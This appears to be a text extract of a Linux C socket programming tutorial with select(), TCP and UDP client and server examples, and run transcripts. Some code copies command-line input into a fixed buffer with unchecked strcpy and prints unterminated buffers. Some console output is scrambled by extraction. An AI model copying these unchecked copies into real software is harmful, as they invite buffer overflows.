If you set the fields in your struct timeval to 0, select() will timeout immediately, effectively polling all the file descriptors in your sets. If you set the parameter timeout to NULL, it will never timeout, and will wait until the first file descriptor is ready. Finally, if you dont care about waiting for a certain set, you can just set it to NULL in the call to select(). The following code snippet waits 5.8 seconds for something to appear on standard input. /*selectcp.c - a select() demo*/ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> /* file descriptor for standard input */ #define STDIN 0 int main(int argc, char *argv[ ]) { struct timeval tval; fd_set readfds; tval.tv_sec = 5; tval.tv_usec = 800000; FD_ZERO(&readfds); FD_SET(STDIN, &readfds); /* dont care about writefds and exceptfds: */ select(STDIN+1, &readfds, NULL, NULL, &tval); if (FD_ISSET(STDIN, &readfds)) printf("A key was pressed lor!\n"); else printf("Timed out lor!...\n"); return 0; }
Compile and link the program. Make sure there is no error :o). [bodo@bakawali testsocket]$ gcc -g selectcp.c -o selectcp Run the program and then press k. [bodo@bakawali testsocket]$ ./selectcp k A key was pressed lor! Run the program and just leave it. [bodo@bakawali testsocket]$ ./selectcp Timed out lor!...

If youre on a line buffered terminal, the key you hit should be RETURN or it will time out anyway. Now, some of you might think this is a great way to wait for data on a datagram socket and you are right: it might be. Some Unices can use select() in this

manner, and some cant. You should see what your local man page says on the matter if you want to attempt it. Some Unices update the time in your struct timeval to reflect the amount of time still remaining before a timeout. But others do not. Dont rely on that occurring if you want to be portable. Use gettimeofday() if you need to track time elapsed. When a socket in the read set closes the connection, select() returns with that socket descriptor set as "ready to read". When you actually do recv() from it, recv() will return 0. Thats how you know the client has closed the connection. If you have a socket that is listen()ing, you can check to see if there is a new connection by putting that sockets file descriptor in the readfds set.

NETWORK PROGRAMMING SOCKET PART 10 - MORE TCP & UDP CLIENT & SERVER PROGRAM EXAMPLES
This is a continuation from Part II series, Socket Part 9. Working program examples if any compiled using gcc, tested using the public IPs, run on Linux Fedora 3 with several times update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and the SELinux set to default configuration. All the program example is generic. Beware codes that expand more than one line. Have a nice ride lol! This Module will cover the following sub-topics: Example: select() server Connecting a TCP server and client:

UDP connectionless client/server Connecting a UDP server and client:

1.Example: Connecting a TCP server to a client, a server program 2.Example: Connecting a TCP client to a server, a client program 1.Example: Connecting a UDP server to a client, a server program 2.Example: Connecting a UDP client to a server, a client program 1.Iterative server 2.spawn() server and spawn() worker 3.sendmsg() server and recvmsg() worker 4.Multiple accept() servers and multiple accept() workers 5.Example: Writing an iterative server program

Connection-oriented server designs:

Example: The select() server The following program example acts like a simple multi-user chat server. Start running it in one window, then telnet to it ("telnet hostname 2020") from other windows. When you type something in one telnet session, it should appear in all the others windows. / *******select.c*********/ / *******Using select() for I/O multiplexing */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> /* port we're listening on */ #define PORT 2020 int main(int argc, char *argv[]) { /* master file descriptor list */ fd_set master; /* temp file descriptor list for select() */ fd_set read_fds; /* server address */ struct sockaddr_in serveraddr; /* client address */ struct sockaddr_in clientaddr; /* maximum file descriptor number */ int fdmax; /* listening socket descriptor */ int listener; /* newly accept()ed socket descriptor */ int newfd; /* buffer for client data */ char buf[1024]; int nbytes; /* for setsockopt() SO_REUSEADDR, below */

6.Example: Connection-oriented common client 7.Example: Sending and receiving a multicast datagram 8.Example: Sending a multicast datagram, a server program 9.Example: Receiving a multicast datagram, a client

int yes = 1; int addrlen; int i, j; /* clear the master and temp sets */ FD_ZERO(&master); FD_ZERO(&read_fds); /* get the listener */ if((listener = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Server-socket() error lol!"); /*just exit lol!*/ exit(1); } printf("Server-socket() is OK...\n"); /*"address already in use" error message */ if(setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) { perror("Server-setsockopt() error lol!"); exit(1); } printf("Server-setsockopt() is OK...\n"); /* bind */ serveraddr.sin_family = AF_INET; serveraddr.sin_addr.s_addr = INADDR_ANY; serveraddr.sin_port = htons(PORT); memset(&(serveraddr.sin_zero), '\0', 8); if(bind(listener, (struct sockaddr *)&serveraddr, sizeof(serveraddr)) == -1) { perror("Server-bind() error lol!"); exit(1); } printf("Server-bind() is OK...\n"); /* listen */ if(listen(listener, 10) == -1) { perror("Server-listen() error lol!"); exit(1); } printf("Server-listen() is OK...\n"); /* add the listener to the master set */ FD_SET(listener, &master);

/* keep track of the biggest file descriptor */ fdmax = listener; /* so far, it's this one*/ /* loop */ for(;;) { /* copy it */ read_fds = master; if(select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1) { perror("Server-select() error lol!"); exit(1); } printf("Server-select() is OK...\n"); /*run through the existing connections looking for data to be read*/ for(i = 0; i <= fdmax; i++) { if(FD_ISSET(i, &read_fds)) { /* we got one... */ if(i == listener) { /* handle new connections */ addrlen = sizeof(clientaddr); if((newfd = accept(listener, (struct sockaddr *)&clientaddr, &addrlen)) == -1) { perror("Server-accept() error lol!"); } else { printf("Server-accept() is OK...\n"); FD_SET(newfd, &master); /* add to master set */ if(newfd > fdmax) { /* keep track of the maximum */ fdmax = newfd; } printf("%s: New connection from %s on socket %d\n", argv[0], inet_ntoa(clientaddr.sin_addr), newfd); } } else { /* handle data from a client */ if((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0)

{ /* got error or connection closed by client */ if(nbytes == 0) /* connection closed */ printf("%s: socket %d hung up\n", argv[0], i); else perror("recv() error lol!"); /* close it... */ close(i); /* remove from master set */ FD_CLR(i, &master); } else { /* we got some data from a client*/ for(j = 0; j <= fdmax; j++) { /* send to everyone! */ if(FD_ISSET(j, &master)) { /* except the listener and ourselves */ if(j != listener && j != i) { if(send(j, buf, nbytes, 0) == -1) perror("send() error lol!"); } } } } } } } } return 0; }
Compile and link the program. [bodo@bakawali testsocket]$ gcc -g select.c -o select

Run the program. [bodo@bakawali testsocket]$ ./select Server-socket() is OK... Server-setsockopt() is OK... Server-bind() is OK... Server-listen() is OK...

You can leave the program running at the background (Ctrl + z).

[bodo@bakawali testsocket]$ ./select Server-socket() is OK... Server-setsockopt() is OK... Server-bind() is OK... Server-listen() is OK... [1]+ Stopped ./select [bodo@bakawali testsocket]$ bg [1]+ ./select & [bodo@bakawali testsocket]$
Do some verification. [bodo@bakawali testsocket]$ ps aux | grep select bodo 27474 0.0 0.2 1384 292 pts/2 S+ 14:32 ./select bodo 27507 0.0 0.5 3724 668 pts/3 S+ 14:34 grep select [bodo@bakawali testsocket]$ netstat -a |grep 2020 tcp 0 0 *:2020 *:* LISTEN [bodo@bakawali testsocket]$

0:00 0:00

Telnet from other computers or windows using hostname or the IP address. Here we use hostname, bakawali. Use escape character ( Ctrl + ] ) to terminate command. For other telnet command please type help. [bodo@bakawali testsocket]$ telnet bakawali 2020 Trying 203.106.93.94... Connected to bakawali.jmti.gov.my (203.106.93.94). Escape character is '^]'. ^] telnet> mode line testing some text the most visible one The last two messages were typed at another two machines that connected through socket 5 and 6 (socket 4 is another window of the server) using telnet. Socket 5 and 6 are from Windows 2000 Server machines. The following are messages on the server console. There are another two machine connected to the server and the messages at the server console is shown below. [bodo@bakawali testsocket]$ Server-select() is OK... Server-accept() is OK... ./select: New connection from 203.106.93.94 on socket 4 Server-select() is OK... ... Server-accept() is OK... ./select: New connection from 203.106.93.91 on socket 5 Server-select() is OK... Server-select() is OK...

... Server-select() is OK... Server-select() is OK... Server-accept() is OK... ./select: New connection from 203.106.93.82 on socket 6

When the clients disconnected from the server through socket 4, 5 and 6, the following messages appear on the server console. OK... OK... hung up OK... hung up OK... hung up

... Server-select() is Server-select() is ./select: socket 5 Server-select() is ./select: socket 6 Server-select() is ./select: socket 4

There are two file descriptor sets in the code: master and read_fds. The first, master, holds all the socket descriptors that are currently connected, as well as the socket descriptor that is listening for new connections. The reason we have the master set is that select() actually changes the set you pass into it to reflect which sockets are ready to read. Since we have to keep track of the connections from one call of select() to the next, we must store these safely away somewhere. At the last minute, we copy the master into the read_fds, and then call select(). Then every time we get a new connection, we have to add it to the master set and also every time a connection closes, we have to remove it from the master set. Notice that we check to see when the listener socket is ready to read. When it is, it means we have a new connection pending, and we accept() it and add it to the master set. Similarly, when a client connection is ready to read, and recv() returns 0, we know that the client has closed the connection, and we must remove it from the master set. If the client recv() returns non-zero, though, we know some data has been received. So we get it, and then go through the master list and send that data to all the rest of the connected clients. Connecting a TCP server and client The following program examples are connection-oriented where sockets use TCP to connect a server to a client, and a client to a server. This example provides more complete sockets APIs usage. Example: Connecting a TCP server to a client, a server program /************tcpserver.c************************/ /* header files needed to use the sockets API */ /* File contain Macro, Data Type and Structure */ /***********************************************/ #include <stdio.h> #include <stdlib.h>

#include <string.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <unistd.h> /* BufferLength is 100 bytes */ #define BufferLength 100 /* Server port number */ #define SERVPORT 3111 int main() { /* Variable and structure definitions. */ int sd, sd2, rc, length = sizeof(int); int totalcnt = 0, on = 1; char temp; char buffer[BufferLength]; struct sockaddr_in serveraddr; struct sockaddr_in their_addr; fd_set read_fd; struct timeval timeout; timeout.tv_sec = 15; timeout.tv_usec = 0; /* The socket() function returns a socket descriptor */ /* representing an endpoint. The statement also */ /* identifies that the INET (Internet Protocol) */ /* address family with the TCP transport (SOCK_STREAM) */ /* will be used for this socket. */ /************************************************/ /* Get a socket descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("Server-socket() error"); /* Just exit */ exit (-1); } else printf("Server-socket() is OK\n"); /* The setsockopt() function is used to allow */ /* the local address to be reused when the server */ /* is restarted before the required wait time */ /* expires. */ /***********************************************/

/* Allow socket descriptor to be reusable */ if((rc = setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))) < 0) { perror("Server-setsockopt() error"); close(sd); exit (-1); } else printf("Server-setsockopt() is OK\n"); /* bind to an address */ memset(&serveraddr, 0x00, sizeof(struct sockaddr_in)); serveraddr.sin_family = AF_INET; serveraddr.sin_port = htons(SERVPORT); serveraddr.sin_addr.s_addr = htonl(INADDR_ANY); printf("Using %s, listening at %d\n", inet_ntoa(serveraddr.sin_addr), SERVPORT); /* After the socket descriptor is created, a bind() */ /* function gets a unique name for the socket. */ /* In this example, the user sets the */ /* s_addr to zero, which allows the system to */ /* connect to any client that used port 3005. */ if((rc = bind(sd, (struct sockaddr *)&serveraddr, sizeof(serveraddr))) < 0) { perror("Server-bind() error"); /* Close the socket descriptor */ close(sd); /* and just exit */ exit(-1); } else printf("Server-bind() is OK\n"); /* The listen() function allows the server to accept */ /* incoming client connections. In this example, */ /* the backlog is set to 10. This means that the */ /* system can queue up to 10 connection requests before */ /* the system starts rejecting incoming requests.*/ /*************************************************/ /* Up to 10 clients can be queued */ if((rc = listen(sd, 10)) < 0) { perror("Server-listen() error"); close(sd);

exit (-1); } else printf("Server-Ready for client connection...\n"); /* The server will accept a connection request */ /* with this accept() function, provided the */ /* connection request does the following: */ /* - Is part of the same address family */ /* - Uses streams sockets (TCP) */ /* - Attempts to connect to the specified port */ /***********************************************/ /* accept() the incoming connection request. */ int sin_size = sizeof(struct sockaddr_in); if((sd2 = accept(sd, (struct sockaddr *)&their_addr, &sin_size)) < 0) { perror("Server-accept() error"); close(sd); exit (-1); } else printf("Server-accept() is OK\n"); /*client IP*/ printf("Server-new socket, sd2 is OK...\n"); printf("Got connection from the f***ing client: %s\n", inet_ntoa(their_addr.sin_addr)); /* The select() function allows the process to */ /* wait for an event to occur and to wake up */ /* the process when the event occurs. In this */ /* example, the system notifies the process */ /* only when data is available to read. */ /***********************************************/ /* Wait for up to 15 seconds on */ /* select() for data to be read. */ FD_ZERO(&read_fd); FD_SET(sd2, &read_fd); rc = select(sd2+1, &read_fd, NULL, NULL, &timeout); if((rc == 1) && (FD_ISSET(sd2, &read_fd))) { /* Read data from the client. */ totalcnt = 0; while(totalcnt < BufferLength) { /* When select() indicates that there is data */

/* available, use the read() function to read */ /* 100 bytes of the string that the */ /* client sent. */ /***********************************************/ /* read() from client */ rc = read(sd2, &buffer[totalcnt], (BufferLength - totalcnt)); if(rc < 0) { perror("Server-read() error"); close(sd); close(sd2); exit (-1); } else if (rc == 0) { printf("Client program has issued a close()\n"); close(sd); close(sd2); exit(-1); } else { totalcnt += rc; printf("Server-read() is OK\n"); } } } else if (rc < 0) { perror("Server-select() error"); close(sd); close(sd2); exit(-1); } /* rc == 0 */ else { printf("Server-select() timed out.\n"); close(sd); close(sd2); exit(-1); } /* Shows the data */ printf("Received data from the f***ing client: %s\n", buffer); /* Echo some bytes of string, back */

/* to the client by using the write() */ /* function. */ /************************************/ /* write() some bytes of string, */ /* back to the client. */ printf("Server-Echoing back to client...\n"); rc = write(sd2, buffer, totalcnt); if(rc != totalcnt) { perror("Server-write() error"); /* Get the error number. */ rc = getsockopt(sd2, SOL_SOCKET, SO_ERROR, &temp, &length); if(rc == 0) { /* Print out the asynchronously */ /* received error. */ errno = temp; perror("SO_ERROR was: "); } else printf("Server-write() is OK\n"); close(sd); close(sd2); exit(-1); } /* When the data has been sent, close() */ /* the socket descriptor that was returned */ /* from the accept() verb and close() the */ /* original socket descriptor. */ /*****************************************/ /* Close the connection to the client and */ /* close the server listening socket. */ /******************************************/ close(sd2); close(sd); exit(0); return 0; }

Compile and link the program. Make sure there is no error. [bodo@bakawali testsocket]$ gcc -g tcpserver.c -o tcpserver Run the program. In this example we let the program run in the background. [bodo@bakawali testsocket]$ ./tcpserver Server-socket() is OK Server-setsockopt() is OK Using 0.0.0.0, listening at 3111 Server-bind() is OK Server-Ready for client connection...

[1]+ Stopped ./tcpserver [bodo@bakawali testsocket]$ bg [1]+ ./tcpserver & [bodo@bakawali testsocket]$ Do some verification. [bodo@bakawali testsocket]$ ps aux | grep tcpserver bodo 7914 0.0 0.2 3172 324 pts/3 S 11:59 ./tcpserver bodo 7921 0.0 0.5 5540 648 pts/3 S+ 12:01 grep tcpserver [bodo@bakawali testsocket]$ netstat -a | grep 3111 tcp 0 0 *:3111 *:* LISTEN

0:00 0:00

When the next program example (the TCP client) is run, the following messages should be expected at the server console. [bodo@bakawali testsocket]$ Server-accept() is OK Server-new socket, sd2 is OK... Got connection from the f***ing client: 203.106.93.94 Server-read() is OK Received data from the f***ing client: This is a test string from client lol!!! Server-Echoing back to client... [1]+ Done [bodo@bakawali testsocket]$

./tcpserver

If the server program and then the client are run, the following messages should be expected at the server console. [bodo@bakawali testsocket]$ ./tcpserver Server-socket() is OK Server-setsockopt() is OK

Using 0.0.0.0, listening at 3111 Server-bind() is OK Server-Ready for client connection... Server-accept() is OK Server-new socket, sd2 is OK... Got connection from the f***ing client: 203.106.93.94 Server-read() is OK Received data from the f***ing client: This is a test string from client lol!!! Server-Echoing back to client... [bodo@bakawali testsocket]$
Just telneting the server. [bodo@bakawali testsocket]$ telnet 203.106.93.94 Trying 203.106.93.94... Connected to bakawali.jmti.gov.my (203.106.93.94). Escape character is '^]'. ^] telnet> help Commands may be abbreviated. Commands are:

3111

close logout connection display mode for more) open quit send set unset status toggle more) slc more) auth encrypt forward for more) z ! environ more) ? telnet>quit

close current connection forcibly logout remote user and close the display operating parameters try to enter line or character mode ('mode ?' connect to a site exit telnet transmit special characters ('send ?' for more) set operating parameters ('set ?' for more) unset operating parameters ('unset ?' for more) print status information toggle operating parameters ('toggle ?' for change state of special charaters ('slc ?' for turn on (off) authentication ('auth ?' for more) turn on (off) encryption ('encrypt ?' for more) turn on (off) credential forwarding ('forward ?' suspend telnet invoke a subshell change environment variables ('environ ?' for print help information

Well, it looks that we have had a telnet session with the server.

NETWORK PROGRAMMING LINUX SOCKET PART 11: TCP CLIENTSERVER CODE SAMPLE
Working program examples if any compiled using gcc, tested using the public IPs, run on Linux Fedora 3 with several times update, as normal user. The Fedora machine used for the testing having the "No Stack Execute"disabled and the SELinux set to default configuration. All the program example is generic. Beware codes that expand more than one line. Example: Connecting a TCP client to a server, a client program Well, let try the client program that will connect to the previous server program. The following example shows how to connect a client socket program to a connection-oriented server. /************tcpclient.c************************/ /* Header files needed to use the sockets API. */ /* File contains Macro, Data Type and */ /* Structure definitions along with Function */ /* prototypes. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #include <errno.h> /* BufferLength is 100 bytes */ #define BufferLength 100 /* Default host name of server system. Change it to your default */ /* server hostname or IP. If the user do not supply the hostname */ /* as an argument, the_server_name_or_IP will be used as default*/ #define SERVER "The_server_name_or_IP" /* Server's port number */ #define SERVPORT 3111 /* Pass in 1 parameter which is either the */ /* address or host name of the server, or */ /* set the server name in the #define SERVER ... */ int main(int argc, char *argv[])

{ /* Variable and structure definitions. */ int sd, rc, length = sizeof(int); struct sockaddr_in serveraddr; char buffer[BufferLength]; char server[255]; char temp; int totalcnt = 0; struct hostent *hostp; char data[100] = "This is a test string from client lol!!! "; /* The socket() function returns a socket */ /* descriptor representing an endpoint. */ /* The statement also identifies that the */ /* INET (Internet Protocol) address family */ /* with the TCP transport (SOCK_STREAM) */ /* will be used for this socket. */ /******************************************/ /* get a socket descriptor */ if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("Client-socket() error"); exit(-1); } else printf("Client-socket() OK\n"); /*If the server hostname is supplied*/ if(argc > 1) { /*Use the supplied argument*/ strcpy(server, argv[1]); printf("Connecting to the f***ing %s, port %d ...\n", server, SERVPORT); } else /*Use the default server name or IP*/ strcpy(server, SERVER); memset(&serveraddr, 0x00, sizeof(struct sockaddr_in)); serveraddr.sin_family = AF_INET; serveraddr.sin_port = htons(SERVPORT); if((serveraddr.sin_addr.s_addr = inet_addr(server)) == (unsigned long)INADDR_NONE) { /* When passing the host name of the server as a */

/* parameter to this program, use the gethostbyname() */ /* function to retrieve the address of the host server. */ /***************************************************/ /* get host address */ hostp = gethostbyname(server); if(hostp == (struct hostent *)NULL) { printf("HOST NOT FOUND --> "); /* h_errno is usually defined */ /* in netdb.h */ printf("h_errno = %d\n",h_errno); printf("---This is a client program---\n"); printf("Command usage: %s <server name or IP>\n", argv[0]); close(sd); exit(-1); } memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr)); } /* After the socket descriptor is received, the */ /* connect() function is used to establish a */ /* connection to the server. */ /***********************************************/ /* connect() to server. */ if((rc = connect(sd, (struct sockaddr *)&serveraddr, sizeof(serveraddr))) < 0) { perror("Client-connect() error"); close(sd); exit(-1); } else printf("Connection established...\n"); /* Send string to the server using */ /* the write() function. */ /*********************************************/ /* Write() some string to the server. */ printf("Sending some string to the f***ing %s...\n", server); rc = write(sd, data, sizeof(data)); if(rc < 0) { perror("Client-write() error"); rc = getsockopt(sd, SOL_SOCKET, SO_ERROR, &temp, &length); if(rc == 0) {

/* Print out the asynchronously received error. */ errno = temp; perror("SO_ERROR was"); } close(sd); exit(-1); } else { printf("Client-write() is OK\n"); printf("String successfully sent lol!\n"); printf("Waiting the %s to echo back...\n", server); } totalcnt = 0; while(totalcnt < BufferLength) { /* Wait for the server to echo the */ /* string by using the read() function. */ /***************************************/ /* Read data from the server. */ rc = read(sd, &buffer[totalcnt], BufferLength-totalcnt); if(rc < 0) { perror("Client-read() error"); close(sd); exit(-1); } else if (rc == 0) { printf("Server program has issued a close()\n"); close(sd); exit(-1); } else totalcnt += rc; } printf("Client-read() is OK\n"); printf("Echoed data from the f***ing server: %s\n", buffer); /* When the data has been read, close() */ /* the socket descriptor. */ /****************************************/ /* Close socket descriptor from client side. */ close(sd); exit(0); return 0;

}
Compile and link the client program. [bodo@bakawali testsocket]$ gcc -g tcpclient.c -o tcpclient

Run the program. Before that dont forget to run the server program first. The first run is without the server hostname/IP. [bodo@bakawali testsocket]$ ./tcpclient Client-socket() OK HOST NOT FOUND --> h_errno = 1 ---This is a client program--Command usage: ./tcpclient <server name or IP> [bodo@bakawali testsocket]$
Then run with the server hostname or IP. [bodo@bakawali testsocket]$ ./tcpclient 203.106.93.94 Client-socket() OK Connecting to the f***ing 203.106.93.94, port 3111 ... Connection established... Sending some string to the f***ing 203.106.93.94... Client-write() is OK String successfully sent lol! Waiting the 203.106.93.94 to echo back... Client-read() is OK Echoed data from the f***ing server: This is a test string from client lol!!! [bodo@bakawali testsocket]$ And at the server console messages. [bodo@bakawali testsocket]$ ./tcpserver Server-socket() is OK Server-setsockopt() is OK Using 0.0.0.0, listening at 3111 Server-bind() is OK Server-Ready for client connection... Server-accept() is OK Server-new socket, sd2 is OK... Got connection from the f***ing client: 203.106.93.94 Server-read() is OK Received data from the f***ing client: This is a test string from client lol!!! Server-Echoing back to client... [bodo@bakawali testsocket]$

Well, it works! UDP connectionless client/server The connectionless protocol server and client examples illustrate the socket APIs that are written for User Datagram Protocol (UDP). The server and client examples use the following sequence of function calls: 1. socket()

2. bind()

The following figure illustrates the client/server relationship of the socket APIs for a connectionless protocol.

Figure 1: UDP connectionless APIs relationship. Connecting a UDP server and client The following examples show how to use UDP to connect a server to a connectionless client, and a connectionless client to a server. Example: Connecting a UDP server to a client, a server program The first example shows how to use UDP to connect a connectionless server socket program to a client. /*******************udpserver.c*****************/ /* Header files needed to use the sockets API. */ /* File contain Macro, Data Type and Structure */ /* definitions along with Function prototypes. */ /* header files */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h>

#include <netinet/in.h> #include <arpa/inet.h> /* Server's port number, listen at 3333 */ #define SERVPORT 3333 /* Run the server without argument */ int main(int argc, char *argv[]) { /* Variable and structure definitions. */ int sd, rc; struct sockaddr_in serveraddr, clientaddr; int clientaddrlen = sizeof(clientaddr); int serveraddrlen = sizeof(serveraddr); char buffer[100]; char *bufptr = buffer; int buflen = sizeof(buffer); /* The socket() function returns a socket */ /* descriptor representing an endpoint. */ /* The statement also identifies that the */ /* INET (Internet Protocol) address family */ /* with the UDP transport (SOCK_DGRAM) will */ /* be used for this socket. */ /******************************************/ /* get a socket descriptor */ if((sd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("UDP server - socket() error"); exit(-1); } else printf("UDP server - socket() is OK\n"); printf("UDP server - try to bind...\n"); /* After the socket descriptor is received, */ /* a bind() is done to assign a unique name */ /* to the socket. In this example, the user */ /* set the s_addr to zero. This allows the */ /* system to connect to any client that uses */ /* port 3333. */ /********************************************/ /* bind to address */ memset(&serveraddr, 0x00, serveraddrlen); serveraddr.sin_family = AF_INET; serveraddr.sin_port = htons(SERVPORT); serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);

if((rc = bind(sd, (struct sockaddr *)&serveraddr, serveraddrlen)) < 0) { perror("UDP server - bind() error"); close(sd); /* If something wrong with socket(), just exit lol */ exit(-1); } else printf("UDP server - bind() is OK\n"); printf("Using IP %s and port %d\n", inet_ntoa(serveraddr.sin_addr), SERVPORT); printf("UDP server - Listening...\n"); /* Use the recvfrom() function to receive the */ /* data. The recvfrom() function waits */ /* indefinitely for data to arrive. */ /************************************************/ /* This example does not use flags that control */ /* the reception of the data. */ /************************************************/ /* Wait on client requests. */ rc = recvfrom(sd, bufptr, buflen, 0, (struct sockaddr *)&clientaddr, &clientaddrlen); if(rc < 0) { perror("UDP Server - recvfrom() error"); close(sd); exit(-1); } else printf("UDP Server - recvfrom() is OK...\n"); printf("UDP Server received the following:\n \"%s\" message\n", bufptr); printf("from port %d and address %s.\n", ntohs(clientaddr.sin_port), inet_ntoa(clientaddr.sin_addr)); /* Send a reply by using the sendto() function. */ /* In this example, the system echoes the received */ /* data back to the client. */ /************************************************/ /* This example does not use flags that control */ /* the transmission of the data */ /************************************************/ /* Send a reply, just echo the request */

printf("UDP Server replying to the stupid UDP client...\n"); rc = sendto(sd, bufptr, buflen, 0, (struct sockaddr *)&clientaddr, clientaddrlen); if(rc < 0) { perror("UDP server - sendto() error"); close(sd); exit(-1); } else printf("UDP Server - sendto() is OK...\n"); /* When the data has been sent, close() the */ /* socket descriptor. */ /********************************************/ /* close() the socket descriptor. */ close(sd); exit(0); }
Compile and link the udp server program. [bodo@bakawali testsocket]$ gcc -g udpserver.c -o udpserver Run the program and let it run in the background. [bodo@bakawali testsocket]$ ./udpserver UDP server - socket() is OK UDP server - try to bind... UDP server - bind() is OK Using IP 0.0.0.0 and port 3333 UDP server - Listening...

[1]+ Stopped ./udpserver [bodo@bakawali testsocket]$ bg [1]+ ./udpserver & [bodo@bakawali testsocket]$ Verify the program running. [bodo@bakawali testsocket]$ ps aux | grep udpserver bodo 7963 0.0 0.2 2240 324 pts/2 S 12:22 ./udpserver bodo 7965 0.0 0.5 4324 648 pts/2 S+ 12:24 grep udpserver Verify that the udp server is listening at port 3333 waiting for the client connection. [bodo@bakawali testsocket]$ netstat -a | grep 3333 udp 0 0 *:3333 *:* [bodo@bakawali testsocket]$

0:00 0:00

Without the client program (next example) you can try telneting the server using port 3333 for testing. For this program example the following telnet session cannot be established for UDP/connectionless. [bodo@bakawali testsocket]$ telnet 203.106.93.94 3333 Trying 203.106.93.94... telnet: connect to address 203.106.93.94: Connection refused telnet: Unable to connect to remote host: Connection refused

Example: Connecting a UDP client to a server, a client program The following example shows how to use UDP to connect a connectionless client socket program to a server. This program will be used to connect to the previous UDP server. /****************udpclient.c********************/ /* Header files needed to use the sockets API. */ /* File contain Macro, Data Type and Structure */ /* definitions along with Function prototypes. */ /***********************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> /* Host name of my system, change accordingly */ /* Put the server hostname that run the UDP server program */ /* This will be used as default UDP server for client connection */ #define SERVER "bakawali" /* Server's port number */ #define SERVPORT 3333 /* Pass in 1 argument (argv[1]) which is either the */ /* address or host name of the server, or */

/* set the server name in the #define SERVER above. */ int main(int argc, char *argv[]) { /* Variable and structure definitions. */ int sd, rc; struct sockaddr_in serveraddr, clientaddr; int serveraddrlen = sizeof(serveraddr); char server[255]; char buffer[100]; char *bufptr = buffer; int buflen = sizeof(buffer); struct hostent *hostp; memset(buffer, 0x00, sizeof(buffer)); /* 36 characters + terminating NULL */ memcpy(buffer, "Hello! A client request message lol!", 37); /* The socket() function returns a socket */ /* descriptor representing an endpoint. */ /* The statement also identifies that the */ /* INET (Internet Protocol) address family */ /* with the UDP transport (SOCK_DGRAM) will */ /* be used for this socket. */ /******************************************/ /* get a socket descriptor */ if((sd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("UDP Client - socket() error"); /* Just exit lol! */ exit(-1); } else printf("UDP Client - socket() is OK!\n"); /* If the hostname/IP of the server is supplied */ /* Or if(argc = 2) */ if(argc > 1) strcpy(server, argv[1]); else { /*Use default hostname or IP*/ printf("UDP Client - Usage %s <Server hostname or IP>\n", argv[0]); printf("UDP Client - Using default hostname/IP!\n"); strcpy(server, SERVER); }

memset(&serveraddr, 0x00, sizeof(struct sockaddr_in)); serveraddr.sin_family = AF_INET; serveraddr.sin_port = htons(SERVPORT); if((serveraddr.sin_addr.s_addr = inet_addr(server)) == (unsigned long)INADDR_NONE) { /* Use the gethostbyname() function to retrieve */ /* the address of the host server if the system */ /* passed the host name of the server as a parameter. */ /************************************************/ /* get server address */ hostp = gethostbyname(server); if(hostp == (struct hostent *)NULL) { printf("HOST NOT FOUND --> "); /* h_errno is usually defined */ /* in netdb.h */ printf("h_errno = %d\n", h_errno); exit(-1); } else { printf("UDP Client - gethostname() of the server is OK... \n"); printf("Connected to UDP server %s on port %d.\n", server, SERVPORT); } memcpy(&serveraddr.sin_addr, hostp->h_addr, sizeof(serveraddr.sin_addr)); } /* Use the sendto() function to send the data */ /* to the server. */ /************************************************/ /* This example does not use flags that control */ /* the transmission of the data. */ /************************************************/ /* send request to server */ rc = sendto(sd, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, sizeof(serveraddr)); if(rc < 0) { perror("UDP Client - sendto() error"); close(sd); exit(-1); } else

printf("UDP Client - sendto() is OK!\n"); printf("Waiting a reply from UDP server...\n"); /* Use the recvfrom() function to receive the */ /* data back from the server. */ /************************************************/ /* This example does not use flags that control */ /* the reception of the data. */ /************************************************/ /* Read server reply. */ /* Note: serveraddr is reset on the recvfrom() function. */ rc = recvfrom(sd, bufptr, buflen, 0, (struct sockaddr *)&serveraddr, &serveraddrlen); if(rc < 0) { perror("UDP Client - recvfrom() error"); close(sd); exit(-1); } else { printf("UDP client received the following: \"%s\" message\n", bufptr); printf(" from port %d, address %s\n", ntohs(serveraddr.sin_port), inet_ntoa(serveraddr.sin_addr)); } /* When the data has been received, close() */ /* the socket descriptor. */ /********************************************/ /* close() the socket descriptor. */ close(sd); exit(0); }
Compile and link the program. [bodo@bakawali testsocket]$ gcc -g udpclient.c -o udpclient

Run the program. Before that make sure the previous program example (the UDP server) is running. [bodo@bakawali testsocket]$ ./udpclient UDP Client - socket() is OK! UDP Client - Usage ./udpclient <Server hostname or IP> UDP Client - Using default hostname/IP! UDP Client - gethostname() of the server is OK... Connected to UDP server bakawali on port 3333. UDP Client - sendto() is OK!

